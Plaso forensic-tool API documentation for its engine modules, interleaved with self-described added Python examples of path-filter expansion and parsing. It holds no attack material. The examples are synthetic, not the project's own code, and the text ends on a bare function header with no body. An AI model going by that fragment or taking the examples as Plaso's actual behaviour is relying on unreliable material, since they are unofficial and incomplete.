ParseDataStream(parser_mediator, file_entry, data_stream_name)
Parses a data stream of a file entry with the enabled parsers.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_entry (dfvfs.FileEntry) – file entry.
• data_stream_name (str) – data stream name.
Raises RuntimeError – if the file-like object or the parser object is missing.
ParseFileEntryMetadata(parser_mediator, file_entry)
Parses the file entry metadata such as file system data.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_entry (dfvfs.FileEntry) – file entry.
ParseMetadataFile(parser_mediator, file_entry, data_stream_name)
Parses a metadata file.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_entry (dfvfs.FileEntry) – file entry.
• data_stream_name (str) – data stream name.
class plaso.engine.extractors.PathSpecExtractor
Bases: object
Path specification extractor.
A path specification extractor extracts path specifications from a source directory, file or storage media device or image.
ExtractPathSpecs(path_specs, find_specs=None, recurse_file_system=True, resolver_context=None)
Extracts path specifications from a specific source.
Parameters
• path_specs (Optional[list[dfvfs.PathSpec]]) – path specifications.
• find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications used in path specification extraction.
• recurse_file_system (Optional[bool]) – True if extraction should recurse into a file system.
• resolver_context (Optional[dfvfs.Context]) – resolver context.
Yields dfvfs.PathSpec – path specification of a file entry found in the source.
plaso.engine.filter_file module
Filter file.
class plaso.engine.filter_file.FilterFile
Bases: object
Filter file.
A filter file contains one or more path filters.
A path filter may contain path expansion attributes. Such an attribute is defined as anything within curly brackets, for example “\System\{my_attribute}\Path\Keyname”. If the attribute “my_attribute” is defined, the placeholder in the path filter is replaced with its runtime value, giving for example “\System\MyValue\Path\Keyname”.
If the path filter needs to contain curly brackets as part of the path, these need to be escaped with another curly bracket, for example “\System\{my_attribute}\{{123-AF25-E523}}\KeyName”, where “{{123-AF25-E523}}” will be replaced with “{123-AF25-E523}” at runtime.
ReadFromFile(path)
Reads the path filters from the filter file.
Parameters path (str) – path to a filter file.
Returns path filters.
Return type list[PathFilter]
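The attribute expansion and curly bracket escaping described for FilterFile above, as an added example in Python that is not Plaso's own code: the attribute values are a constructed mapping, and treating an undefined attribute or an unbalanced bracket as an error is a choice made for this example.

```python
"""Expands path expansion attributes in filter file path filters.

Added example, not Plaso's own implementation: it follows the rules described
for plaso.engine.filter_file.FilterFile. "{name}" is replaced by the runtime
value of attribute "name"; "{{" and "}}" are escapes for literal curly brackets.
"""
import re
from typing import Dict, List

# One token at a time: an escaped "{{", an escaped "}}", or an attribute
# placeholder "{name}" (anything between a single pair of curly brackets).
_TOKEN_RE = re.compile(r'\{\{|\}\}|\{([^{}]+)\}')


class PathFilterExpansionError(Exception):
  """Raised when a path filter cannot be expanded."""


def _CheckLiteral(literal: str, path: str) -> str:
  """Ensures a literal piece of the path contains no stray curly bracket."""
  if '{' in literal or '}' in literal:
    raise PathFilterExpansionError(
        'unbalanced curly bracket in path filter: {0:s}'.format(path))
  return literal


def ExpandPathFilter(path: str, attributes: Dict[str, str]) -> str:
  """Expands attributes and escaped curly brackets in one path filter.

  Args:
    path: path filter, such as "\\System\\{my_attribute}\\Path\\Keyname".
    attributes: runtime attribute values keyed by attribute name (constructed
        for this example; at runtime they would come from the knowledge base).

  Returns:
    str: the expanded path filter.

  Raises:
    PathFilterExpansionError: if an attribute is undefined or a curly bracket
        is unbalanced (both choices made for this example).
  """
  pieces: List[str] = []
  position = 0
  for match in _TOKEN_RE.finditer(path):
    # Text between two tokens is literal and must not contain brackets.
    pieces.append(_CheckLiteral(path[position:match.start()], path))
    token = match.group(0)
    if token == '{{':
      pieces.append('{')
    elif token == '}}':
      pieces.append('}')
    else:
      name = match.group(1)
      if name not in attributes:
        raise PathFilterExpansionError(
            'undefined attribute "{0:s}" in path filter: {1:s}'.format(
                name, path))
      pieces.append(attributes[name])
    position = match.end()
  pieces.append(_CheckLiteral(path[position:], path))
  return ''.join(pieces)


def ExpandPathFilters(
    paths: List[str], attributes: Dict[str, str]) -> List[str]:
  """Expands every path of a path filter, such as PathFilter.paths."""
  return [ExpandPathFilter(path, attributes) for path in paths]
```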
plaso.engine.filters_helper module
Collection filters helper.
class plaso.engine.filters_helper.CollectionFiltersHelper
Bases: object
Helper for collection filters.
excluded_file_system_find_specs (list[dfvfs.FindSpec]) – file system find specifications of paths to exclude from the collection.
included_file_system_find_specs (list[dfvfs.FindSpec]) – file system find specifications of paths to include in the collection.
registry_find_specs (list[dfwinreg.FindSpec]) – Windows Registry find specifications.
plaso.engine.knowledge_base module
The artifact knowledge base object.
The knowledge base is filled by user provided input and the pre-processing phase. It is intended to provide successive phases, like the parsing and analysis phases, with essential information like the timezone and codepage of the source data.
class plaso.engine.knowledge_base.KnowledgeBase
Bases: object
The knowledge base.
AddAvailableTimeZone(time_zone, session_identifier=None)
Adds an available time zone.
Parameters
• time_zone (TimeZoneArtifact) – time zone artifact.
• session_identifier (Optional[str]) – session identifier, where None represents the active session.
Raises KeyError – if the time zone already exists.
AddEnvironmentVariable(environment_variable)
Adds an environment variable.
Parameters environment_variable (EnvironmentVariableArtifact) – environment variable artifact.
Raises KeyError – if the environment variable already exists.
AddUserAccount(user_account, session_identifier=None)
Adds a user account.
Parameters
• user_account (UserAccountArtifact) – user account artifact.
• session_identifier (Optional[str]) – session identifier, where None represents the active session.
Raises KeyError – if the user account already exists.
GetEnvironmentVariable(name)
Retrieves an environment variable.
Parameters name (str) – name of the environment variable.
Returns environment variable artifact or None if there was no value set for the given name.
Return type EnvironmentVariableArtifact
GetEnvironmentVariables()
Retrieves the environment variables.
Returns environment variable artifacts.
Return type list[EnvironmentVariableArtifact]
GetHostname(session_identifier=None)
Retrieves the hostname related to the event.
If the hostname is not stored in the event it is determined based on the preprocessing information that is stored inside the storage file.
Parameters session_identifier (Optional[str]) – session identifier, where None represents the active session.
Returns hostname.
Return type str
GetMountPath()
Retrieves the mount path of the source.
Returns mount path of the source or None if not set.
Return type str
GetSourceConfigurationArtifacts(session_identifier=None)
Retrieves the knowledge base as source configuration artifacts.
Parameters session_identifier (Optional[str]) – session identifier, where None represents the active session.
Returns source configuration artifacts.
Return type list[SourceConfigurationArtifact]
GetTextPrepend()
Retrieves the text to prepend to the display name.
Returns text to prepend to the display name or None if not set.
Return type str
GetUsernameByIdentifier(user_identifier, session_identifier=None)
Retrieves the username based on a user identifier.
Parameters
• user_identifier (str) – user identifier, either a UID or SID.
• session_identifier (Optional[str]) – session identifier, where None represents the active session.
Returns username.
Return type str
GetUsernameForPath(path)
Retrieves a username for a specific path.
This determines if a specific path is within a user’s directory and, if so, returns the username of that user.
Parameters path (str) – path.
Returns username or None if the path does not appear to be within a user’s directory.
Return type str
GetValue(identifier, default_value=None)
Retrieves a value by identifier.
Parameters
• identifier (str) – case insensitive unique identifier for the value.
• default_value (object) – default value.
Returns value or default value if not available.
Return type object
Raises TypeError – if the identifier is not a string type.
HasUserAccounts()
Determines if the knowledge base contains user accounts.
Returns True if the knowledge base contains user accounts.
Return type bool
ReadSystemConfigurationArtifact(system_configuration, session_identifier=None)
Reads the knowledge base values from a system configuration artifact.
Note that this overwrites existing values in the knowledge base.
Parameters
• system_configuration (SystemConfigurationArtifact) – system configuration artifact.
• session_identifier (Optional[str]) – session identifier, where None represents the active session.
SetActiveSession(session_identifier)
Sets the active session.
Parameters session_identifier (str) – session identifier, where None represents the default active session.
SetCodepage(codepage)
Sets the codepage.
Parameters codepage (str) – codepage.
Raises ValueError – if the codepage is not supported.
SetEnvironmentVariable(environment_variable)
Sets an environment variable.
Parameters environment_variable (EnvironmentVariableArtifact) – environment variable artifact.
SetHostname(hostname, session_identifier=None)
Sets a hostname.
Parameters
• hostname (HostnameArtifact) – hostname artifact.
• session_identifier (Optional[str]) – session identifier, where None represents the active session.
SetMountPath(mount_path)
Sets the mount path of the source.
Parameters mount_path (str) – mount path of the source or None if the source is not mounted onto a directory.
SetTextPrepend(text_prepend)
Sets the text to prepend to the display name.
Parameters text_prepend (str) – text to prepend to the display name or None if no text should be prepended.
SetTimeZone(time_zone)
Sets the time zone.
Parameters time_zone (str) – time zone.
Raises ValueError – if the time zone is not supported.
SetValue(identifier, value)
Sets a value by identifier.
Parameters
• identifier (str) – case insensitive unique identifier for the value.
• value (object) – value.
Raises TypeError – if the identifier is not a string type.
property available_time_zones (list[TimeZone]) – available time zones of the current session.
property codepage (str) – codepage of the current session.
property hostname (str) – hostname of the current session.
property timezone (datetime.tzinfo) – timezone of the current session.
property user_accounts (list[UserAccountArtifact]) – user accounts of the current session.
property year (int) – year of the current session.
plaso.engine.logger module
The engine sub module logger.
plaso.engine.path_filters module
Path filters.
Path filters are specified in filter files and are used during collection to include or exclude file system paths.
class plaso.engine.path_filters.PathCollectionFiltersHelper
Bases: plaso.engine.filters_helper.CollectionFiltersHelper
Path collection filters helper.
BuildFindSpecs(path_filters, environment_variables=None)
Builds find specifications from path filters.
Parameters
• path_filters (list[PathFilter]) – path filters.
• environment_variables (Optional[list[EnvironmentVariableArtifact]]) – environment variables.
class plaso.engine.path_filters.PathFilter(filter_type, description=None, path_separator='/', paths=None)
Bases: object
Path filter.
description (str) – description of the purpose of the filter or None if not set.
filter_type (str) – indicates if the filter should include or exclude paths during collection.
path_separator (str) – path segment separator.
paths (list[str]) – paths to filter.
FILTER_TYPE_EXCLUDE = 'exclude'
FILTER_TYPE_INCLUDE = 'include'
plaso.engine.path_helper module
The path helper.
class plaso.engine.path_helper.PathHelper
Bases: object
Class that implements the path helper.
classmethod ExpandGlobStars(path, path_separator)
Expands globstars “**” in a path.
A globstar “**” will recursively match all files and zero or more directories and subdirectories.
By default the maximum recursion depth is 10 subdirectories; a numeric value after the globstar, such as “**5”, can be used to define the maximum recursion depth.
Parameters
• path (str) – path to be expanded.
• path_separator (str) – path segment separator.
Returns the path expanded for each glob.
Return type list[str]
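The globstar expansion described for ExpandGlobStars above, as an added example in Python that is not Plaso's own implementation; it assumes the globstar is the last path segment and rejects a depth outside 1..10, both choices made for this example.

```python
"""Expands globstar path segments as described for PathHelper.ExpandGlobStars.

Added example, not Plaso's own implementation. A trailing "**" segment stands
for one or more wildcard segments up to a maximum depth: 10 by default, or
the number following the globstar, such as "**5". Each expanded path is a
plain glob that a file system searcher can match directly.
"""
from typing import List

DEFAULT_MAXIMUM_DEPTH = 10


def _ParseGlobStarDepth(segment: str) -> int:
  """Returns the recursion depth encoded in a "**" or "**N" segment."""
  if segment == '**':
    return DEFAULT_MAXIMUM_DEPTH
  try:
    depth = int(segment[2:], 10)
  except ValueError:
    raise ValueError('unsupported globstar segment: {0:s}'.format(segment))
  # Assumption made for this example: depths outside 1..10 are rejected
  # rather than silently clamped.
  if depth < 1 or depth > DEFAULT_MAXIMUM_DEPTH:
    raise ValueError('unsupported globstar depth: {0:d}'.format(depth))
  return depth


def ExpandGlobStars(path: str, path_separator: str) -> List[str]:
  """Expands a trailing globstar into one glob per recursion depth.

  Args:
    path: path to be expanded, such as "/var/log/**2".
    path_separator: path segment separator, such as "/" or "\\".

  Returns:
    list[str]: the path expanded for each depth, or the unchanged path in a
        single-element list when it contains no globstar.

  Raises:
    ValueError: if a globstar is not the last path segment (assumption made
        for this example), or its depth is invalid.
  """
  segments = path.split(path_separator)
  if not segments[-1].startswith('**'):
    if any('**' in segment for segment in segments):
      raise ValueError(
          'globstar must be the last path segment: {0:s}'.format(path))
    return [path]
  depth = _ParseGlobStarDepth(segments[-1])
  prefix = segments[:-1]
  # Depth 1 matches files directly below the prefix (zero directories),
  # depth N matches files N-1 directory levels deeper.
  return [
      path_separator.join(prefix + ['*'] * level)
      for level in range(1, depth + 1)]
```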
classmethod ExpandUsersVariablePath(path, path_separator, user_accounts)
Expands a path with a users variable, such as %%users.homedir%%.
Parameters
• path (str) – path with users variable.
• path_separator (str) – path segment separator.
• user_accounts (list[UserAccountArtifact]) – user accounts.
Returns paths for which the users variables have been expanded.
Return type list[str]
classmethod ExpandWindowsPath(path, environment_variables)
Expands a Windows path containing environment variables.
Parameters
• path (str) – Windows path with environment variables.
• environment_variables (list[EnvironmentVariableArtifact]) – environment variables.
Returns expanded Windows path.
Return type str
classmethod ExpandWindowsPathSegments(path_segments, environment_variables)
Expands Windows path segments containing environment variables.
Parameters
• path_segments (list[str]) – Windows path segments with environment variables.
• environment_variables (list[EnvironmentVariableArtifact]) – environment variables.
Returns expanded Windows path segments.
Return type list[str]
classmethod GetDisplayNameForPathSpec(path_spec, mount_path=None, text_prepend=None)
Retrieves the display name of a path specification.
Parameters
• path_spec (dfvfs.PathSpec) – path specification.
• mount_path (Optional[str]) – path where the file system that is used by the path specification is mounted, such as “/mnt/image”. The mount path will be stripped from the absolute path defined by the path specification.
• text_prepend (Optional[str]) – text to prepend.
Returns human readable version of the path specification or None if no path specification was provided.
Return type str
classmethod GetRelativePathForPathSpec(path_spec, mount_path=None)
Retrieves the relative path of a path specification.
If a mount path is defined the path will be relative to the mount point, otherwise the path is relative to the root of the file system that is used by the path specification.
Parameters
• path_spec (dfvfs.PathSpec) – path specification.
• mount_path (Optional[str]) – path where the file system that is used by the path specification is mounted, such as “/mnt/image”. The mount path will be stripped from the absolute path defined by the path specification.
Returns relative path or None.
Return type str
plaso.engine.plaso_queue module
Queue management implementation for Plaso.
This file contains an implementation of a queue used by plaso for queue management.
The queue has been abstracted in order to provide support for different implementations of the queueing mechanism, to support multi processing and scalability.
class plaso.engine.plaso_queue.Queue
Bases: object
Class that implements the queue interface.
abstract Close(abort=False)
Closes the queue.
Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost.
abstract IsEmpty()
Determines if the queue is empty.
abstract Open()
Opens the queue, ready to enqueue or dequeue items.
abstract PopItem()
Pops an item off the queue.
Raises QueueEmpty – when the queue is empty.
abstract PushItem(item, block=True)
Pushes an item onto the queue.
Parameters
• item (object) – item to add.
• block (bool) – whether to block if the queue is full.
Raises QueueFull – if the queue is full, and the item could not be added.
class plaso.engine.plaso_queue.QueueAbort
Bases: object
Class that implements a queue abort.
plaso.engine.process_info module
Information about running process.
class plaso.engine.process_info.ProcessInfo(pid)
Bases: object
Provides information about a running process.
GetUsedMemory()
Retrieves the amount of memory used by the process.
Returns amount of memory in bytes used by the process or None if not available.
Return type int
plaso.engine.processing_status module
Processing status classes.
class plaso.engine.processing_status.EventsStatus
Bases: object
The status of the events.
number_of_duplicate_events (int) – number of duplicate events, not including the original.
number_of_events_from_time_slice (int) – number of events from time slice.
number_of_filtered_events (int) – number of events excluded by the event filter.
number_of_macb_grouped_events (int) – number of events grouped based on MACB.
total_number_of_events (int) – total number of events in the storage file.
class plaso.engine.processing_status.ProcessStatus
Bases: object
The status of an individual process.
display_name (str) – human readable name of the file entry currently being processed by the process.
identifier (str) – process identifier.
last_running_time (int) – timestamp of the last update when the process had a running process status.
number_of_consumed_event_tags (int) – total number of event tags consumed by the process.
number_of_consumed_event_tags_delta (int) – number of event tags consumed by the process since the last status update.
number_of_consumed_events (int) – total number of events consumed by the process.
number_of_consumed_events_delta (int) – number of events consumed by the process since the last status update.
number_of_consumed_reports (int) – total number of event reports consumed by the process.
number_of_consumed_reports_delta (int) – number of event reports consumed by the process since the last status update.
number_of_consumed_sources (int) – total number of event sources consumed by the process.
number_of_consumed_sources_delta (int) – number of event sources consumed by the process since the last status update.
number_of_consumed_warnings (int) – total number of warnings consumed by the process.
number_of_consumed_warnings_delta (int) – number of warnings consumed by the process since the last status update.
number_of_produced_event_tags (int) – total number of event tags produced by the process.
number_of_produced_event_tags_delta (int) – number of event tags produced by the process since the last status update.
number_of_produced_events (int) – total number of events produced by the process.
number_of_produced_events_delta (int) – number of events produced by the process since the last status update.
number_of_produced_reports (int) – total number of event reports produced by the process.
number_of_produced_reports_delta (int) – number of event reports produced by the process since the last status update.
number_of_produced_sources (int) – total number of event sources produced by the process.
number_of_produced_sources_delta (int) – number of event sources produced by the process since the last status update.
number_of_produced_warnings (int) – total number of warnings produced by the process.
number_of_produced_warnings_delta (int) – number of warnings produced by the process since the last status update.
pid (int) – process identifier (PID).
status (str) – human readable status indication such as “Hashing” or “Idle”.
used_memory (int) – size of used memory in bytes.
UpdateNumberOfEventReports(number_of_consumed_reports, number_of_produced_reports)
Updates the number of event reports.
Parameters
• number_of_consumed_reports (int) – total number of event reports consumed by the process.
• number_of_produced_reports (int) – total number of event reports produced by the process.
Returns True if either number of event reports has increased.
Return type bool
Raises ValueError – if the consumed or produced number of event reports is smaller than the value of the previous update.
UpdateNumberOfEventSources(number_of_consumed_sources, number_of_produced_sources)
Updates the number of event sources.
Parameters
• number_of_consumed_sources (int) – total number of event sources consumed by the process.
• number_of_produced_sources (int) – total number of event sources produced by the process.
Returns True if either number of event sources has increased.
Return type bool
Raises ValueError – if the consumed or produced number of event sources is smaller than the value of the previous update.
UpdateNumberOfEventTags(number_of_consumed_event_tags, number_of_produced_event_tags)
Updates the number of event tags.
Parameters
• number_of_consumed_event_tags (int) – total number of event tags consumed by the process.
• number_of_produced_event_tags (int) – total number of event tags produced by the process.
Returns True if either number of event tags has increased.
Return type bool
Raises ValueError – if the consumed or produced number of event tags is smaller than the value of the previous update.
UpdateNumberOfEvents(number_of_consumed_events, number_of_produced_events)
Updates the number of events.
Parameters
• number_of_consumed_events (int) – total number of events consumed by the process.
• number_of_produced_events (int) – total number of events produced by the process.
Returns True if either number of events has increased.
Return type bool
Raises ValueError – if the consumed or produced number of events is smaller than the value of the previous update.
UpdateNumberOfWarnings(number_of_consumed_warnings, number_of_produced_warnings)
Updates the number of warnings.
Parameters
• number_of_consumed_warnings (int) – total number of warnings consumed by the process.
• number_of_produced_warnings (int) – total number of warnings produced by the process.
Returns True if either number of warnings has increased.
Return type bool
Raises ValueError – if the consumed or produced number of warnings is smaller than the value of the previous update.
class plaso.engine.processing_status.ProcessingStatus
Bases: object
The status of the overall extraction process (processing).
aborted (bool) – True if processing was aborted.
error_path_specs (list[dfvfs.PathSpec]) – path specifications that caused critical errors during processing.
events_status (EventsStatus) – status information about events.
foreman_status (ProcessingStatus) – foreman processing status.
start_time (float) – time that the processing was started. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC.
tasks_status (TasksStatus) – status information about tasks.
UpdateEventsStatus(events_status)
Updates the events status.
Parameters events_status (EventsStatus) – status information about events.
UpdateForemanStatus(identifier, status, pid, used_memory, display_name, number_of_consumed_sources, number_of_produced_sources, number_of_consumed_events, number_of_produced_events, number_of_consumed_event_tags, number_of_produced_event_tags, number_of_consumed_reports, number_of_produced_reports, number_of_consumed_warnings, number_of_produced_warnings)
Updates the status of the foreman.
Parameters
• identifier (str) – foreman identifier.
• status (str) – human readable status indication such as “Hashing” or “Idle”.
• pid (int) – process identifier (PID).
• used_memory (int) – size of used memory in bytes.
• display_name (str) – human readable name of the file entry currently being processed by the foreman.
• number_of_consumed_sources (int) – total number of event sources consumed by the foreman.
• number_of_produced_sources (int) – total number of event sources produced by the foreman.
• number_of_consumed_events (int) – total number of events consumed by the foreman.
• number_of_produced_events (int) – total number of events produced by the foreman.
• number_of_consumed_event_tags (int) – total number of event tags consumed by the foreman.
• number_of_produced_event_tags (int) – total number of event tags produced by the foreman.
• number_of_consumed_warnings (int) – total number of warnings consumed by the foreman.
• number_of_produced_warnings (int) – total number of warnings produced by the foreman.
• number_of_consumed_reports (int) – total number of event reports consumed by the foreman.
• number_of_produced_reports (int) – total number of event reports produced by the process.
UpdateTasksStatus(tasks_status)
Updates the tasks status.
Parameters tasks_status (TasksStatus) – status information about tasks.
UpdateWorkerStatus(identifier, status, pid, used_memory, display_name, number_of_consumed_sources, number_of_produced_sources, number_of_consumed_events, number_of_produced_events, number_of_consumed_event_tags, number_of_produced_event_tags, number_of_consumed_reports, number_of_produced_reports, number_of_consumed_warnings, number_of_produced_warnings)
Updates the status of a worker.
Parameters
• identifier (str) – worker identifier.
• status (str) – human readable status indication such as “Hashing” or “Idle”.
• pid (int) – process identifier (PID).
• used_memory (int) – size of used memory in bytes.
• display_name (str) – human readable name of the file entry currently being processed by the worker.
• number_of_consumed_sources (int) – total number of event sources consumed by the worker.
• number_of_produced_sources (int) – total number of event sources produced by the worker.
• number_of_consumed_events (int) – total number of events consumed by the worker.
• number_of_produced_events (int) – total number of events produced by the worker.
• number_of_consumed_event_tags (int) – total number of event tags consumed by the worker.
• number_of_produced_event_tags (int) – total number of event tags produced by the worker.
• number_of_consumed_reports (int) – total number of event reports consumed by the process.
• number_of_produced_reports (int) – total number of event reports produced by the process.
• number_of_consumed_warnings (int) – total number of warnings consumed by the worker.
• number_of_produced_warnings (int) – total number of warnings produced by the worker.
property workers_status
The worker status objects sorted by identifier.
class plaso.engine.processing_status.TasksStatus
Bases: object
The status of the tasks.
number_of_abandoned_tasks
number of abandoned tasks.
Type int
number_of_queued_tasks
number of active tasks.
Type int
number_of_tasks_pending_merge
number of tasks pending merge.
Type int
number_of_tasks_processing
number of tasks processing.
Type int
total_number_of_tasks
total number of tasks.
Type int
plaso.engine.profilers module
The profiler classes.
class plaso.engine.profilers.AnalyzersProfiler(identifier, configuration)
Bases: plaso.engine.profilers.CPUTimeProfiler
The analyzers profiler.
class plaso.engine.profilers.CPUTimeMeasurement
Bases: object
The CPU time measurement.
start_sample_time
start sample time or None if not set.
Type float
total_cpu_time
total CPU time or None if not set.
Type float
SampleStart()
Starts measuring the CPU time.
SampleStop()
Stops measuring the CPU time.
class plaso.engine.profilers.CPUTimeProfiler(identifier, configuration)
Bases: plaso.engine.profilers.SampleFileProfiler
The CPU time profiler.
StartTiming(profile_name)
Starts timing CPU time.
Parameters profile_name (str) – name of the profile to sample.
StopTiming(profile_name)
Stops timing CPU time.
Parameters profile_name (str) – name of the profile to sample.
class plaso.engine.profilers.MemoryProfiler(identifier, configuration)
Bases: plaso.engine.profilers.SampleFileProfiler
The memory profiler.
Sample(profile_name, used_memory)
Takes a sample for profiling.
Parameters
• profile_name (str) – name of the profile to sample.
• used_memory (int) – amount of used memory in bytes.
class plaso.engine.profilers.ProcessingProfiler(identifier, configuration)
Bases: plaso.engine.profilers.CPUTimeProfiler
The processing profiler.
class plaso.engine.profilers.SampleFileProfiler(identifier, configuration)
Bases: object
Shared functionality for sample file-based profilers.
classmethod IsSupported()
Determines if the profiler is supported.
Returns True if the profiler is supported.
Return type bool
Start()
Starts the profiler.
Stop()
Stops the profiler.
class plaso.engine.profilers.SerializersProfiler(identifier, configuration)
Bases: plaso.engine.profilers.CPUTimeProfiler
The serializers profiler.
class plaso.engine.profilers.StorageProfiler(identifier, configuration)
Bases: plaso.engine.profilers.SampleFileProfiler
The storage profiler.
Sample(profile_name, operation, description, data_size, compressed_data_size)
Takes a sample of data read or written for profiling.
Parameters
• profile_name (str) – name of the profile to sample.
• operation (str) – operation, either ‘read’ or ‘write’.
• description (str) – description of the data read.
• data_size (int) – size of the data read in bytes.
• compressed_data_size (int) – size of the compressed data read in bytes.
StartTiming(profile_name)
Starts timing CPU time.
Parameters profile_name (str) – name of the profile to sample.
StopTiming(profile_name)
Stops timing CPU time.
Parameters profile_name (str) – name of the profile to sample.
class plaso.engine.profilers.TaskQueueProfiler(identifier, configuration)
Bases: plaso.engine.profilers.SampleFileProfiler
The task queue profiler.
Sample(tasks_status)
Takes a sample of the status of queued tasks for profiling.
Parameters tasks_status (TasksStatus) – status information about tasks.
class plaso.engine.profilers.TasksProfiler(identifier, configuration)
Bases: plaso.engine.profilers.SampleFileProfiler
The tasks profiler.
Sample(task, status)
Takes a sample of the status of a task for profiling.
Parameters
• task (Task) – a task.
• status (str) – status.
plaso.engine.single_process module
The single process processing engine.
class plaso.engine.single_process.SingleProcessEngine
Bases: plaso.engine.engine.BaseEngine
Class that defines the single process engine.
ProcessSources(session, source_path_specs, storage_writer, resolver_context, processing_configuration, status_update_callback=None)
Processes the sources.
Parameters
• session (Session) – session in which the sources are processed.
• source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process.
• storage_writer (StorageWriter) – storage writer for a session storage.
• resolver_context (dfvfs.Context) – resolver context.
• processing_configuration (ProcessingConfiguration) – processing configuration.
• status_update_callback (Optional[function]) – callback function for status updates.
Returns processing status.
Return type ProcessingStatus
plaso.engine.tagging_file module
Tagging file.
class plaso.engine.tagging_file.TaggingFile(path)
Bases: object
Tagging file that defines one or more event tagging rules.
GetEventTaggingRules()
Retrieves the event tagging rules from the tagging file.
Returns tagging rules, which consist of one or more filter objects per label.
Return type dict[str, FilterObject]
Raises TaggingFileError – if a filter expression cannot be compiled.
plaso.engine.worker module
The event extraction worker.
class plaso.engine.worker.EventExtractionWorker(parser_filter_expression=None)
Bases: object
Event extraction worker.
The event extraction worker determines which parsers are suitable for parsing a particular file entry or data stream. The parsers extract relevant data from file system and/or file content data. All extracted data is passed to the parser mediator for further processing.
last_activity_timestamp
timestamp received that indicates the last time activity was observed.
Type int
processing_status
human readable status indication such as: ‘Extracting’, ‘Hashing’.
Type str
GetAnalyzerNames()
Gets the names of the active analyzers.
Returns names of active analyzers.
Return type list[str]
ProcessPathSpec(mediator, path_spec, excluded_find_specs=None)
Processes a path specification.
Parameters
• mediator (ParserMediator) – mediates the interactions between parsers and other components, such as storage and abort signals.
• path_spec (dfvfs.PathSpec) – path specification.
• excluded_find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications that are excluded from processing.
SetAnalyzersProfiler(analyzers_profiler)
Sets the analyzers profiler.
Parameters analyzers_profiler (AnalyzersProfiler) – analyzers profiler.
SetExtractionConfiguration(configuration)
Sets the extraction configuration settings.
Parameters configuration (ExtractionConfiguration) – extraction configuration.
SetProcessingProfiler(processing_profiler)
Sets the processing profiler.
Parameters processing_profiler (ProcessingProfiler) – processing profiler.
SignalAbort()
Signals the extraction worker to abort.
plaso.engine.yaml_filter_file module
YAML-based filter file.
class plaso.engine.yaml_filter_file.YAMLFilterFile
Bases: object
YAML-based filter file.
A YAML-based filter file contains one or more path filters, for example:
description: Include filter with Linux paths.
type: include
path_separator: '/'
paths:
- '/usr/bin'
Where:
• description, is an optional description of the purpose of the path filter;
• type, defines the filter type, which can be “include” or “exclude”;
• path_separator, defines the path segment separator, which is “/” by default;
• paths, defines regular expressions of paths to filter on.
Note that the regular expression needs to be defined per path segment; for example, to filter “/usr/bin/echo” and “/usr/sbin/echo” the following expression could be defined: “/usr/(bin|sbin)/echo”.
Note that when the path segment separator is defined as “\” it needs to be escaped as “\\”, since “\” is used by the regular expression as escape character.
A path may contain path expansion attributes, for example: %{SystemRoot}\System32
ReadFromFile(path)
Reads the path filters from the YAML-based filter file.
Parameters path (str) – path to a filter file.
Returns path filters.
Return type list[PathFilter]
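The per-segment matching, the include/exclude types and the separator escaping rule described above, as an added example that is not plaso's own code. The tiny reader for the flat layout shown (plaso uses a YAML library), the use of the escaped separator as the regular expression that splits real paths, the %{...} expansion against a caller-supplied mapping and the "exclude wins, then an include must match" collection rule are assumptions of this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample filter file in the layout documented above. The backslash
# separator of the second filter is written escaped as '\\' (see the note);
# using that escaped form as the regular expression that splits real paths
# is an assumption of this example.
SAMPLE_FILTER_FILE = r"""
description: Include filter with Linux paths.
type: include
path_separator: '/'
paths:
- '/usr/(bin|sbin)/echo'
- '/etc/ssh/sshd_config'
---
description: Exclude filter for Windows setup logs.
type: exclude
path_separator: '\\'
paths:
- '%{SystemRoot}\\System32\\.*\.log'
"""

PATH_ATTRIBUTE = re.compile(r'%\{([^}]+)\}')


def _unquote(value):
    """Strips one layer of matching single or double quotes."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in '\'"':
        return value[1:-1]
    return value


def expand_path_attributes(path, separator, environment):
    """Replaces %{NAME} with its value from environment (an assumed mapping);
    regex metacharacters in the value are escaped, separators are kept."""
    def replace(match):
        if match.group(1) not in environment:
            raise KeyError(f'no value for path attribute {match.group(0)}')
        parts = re.split(separator, environment[match.group(1)])
        return separator.join(re.escape(part) for part in parts)
    return PATH_ATTRIBUTE.sub(replace, path)


@dataclass
class PathFilter:
    filter_type: str     # 'include' or 'exclude'
    path_separator: str  # as written in the file, i.e. regex-escaped
    segment_patterns: list = field(default_factory=list)

    @classmethod
    def from_definition(cls, definition, environment):
        filter_type = definition.get('type')
        if filter_type not in ('include', 'exclude'):
            raise ValueError(f'unsupported filter type: {filter_type!r}')
        separator = definition.get('path_separator', '/')
        try:
            re.compile(separator)
        except re.error as error:  # e.g. a bare '\' separator
            raise ValueError("path_separator must be a valid regular "
                             "expression; write a backslash as '\\\\'") from error
        path_filter = cls(filter_type, separator)
        for path in definition.get('paths', []):
            expanded = expand_path_attributes(path, separator, environment)
            # One regular expression per path segment, as the note requires.
            path_filter.segment_patterns.append(
                [re.compile(segment) for segment in expanded.split(separator)])
        return path_filter

    def matches(self, path):
        """True if some path regex matches path segment by segment."""
        segments = re.split(self.path_separator, path)
        return any(
            len(patterns) == len(segments) and all(
                pattern.fullmatch(segment)
                for pattern, segment in zip(patterns, segments))
            for patterns in self.segment_patterns)


def parse_filter_file(text, environment=None):
    """Reads the flat key/value layout shown above into PathFilter objects."""
    definitions, current = [], {}
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith('#'):
            continue
        if line == '---':
            definitions.append(current)
            current = {}
        elif line.startswith('- '):
            current.setdefault('paths', []).append(_unquote(line[2:].strip()))
        else:
            key, _, value = line.partition(':')
            value = value.strip()
            current[key.strip()] = _unquote(value) if value else []
    definitions.append(current)
    return [PathFilter.from_definition(d, environment or {}) for d in definitions if d]


def should_collect(path_filters, path):
    """An exclude match wins; otherwise the path must match some include filter
    whenever at least one include filter is defined (assumed semantics)."""
    if any(f.filter_type == 'exclude' and f.matches(path) for f in path_filters):
        return False
    includes = [f for f in path_filters if f.filter_type == 'include']
    return not includes or any(f.matches(path) for f in includes)


def check_filter_file(text, environment=None):
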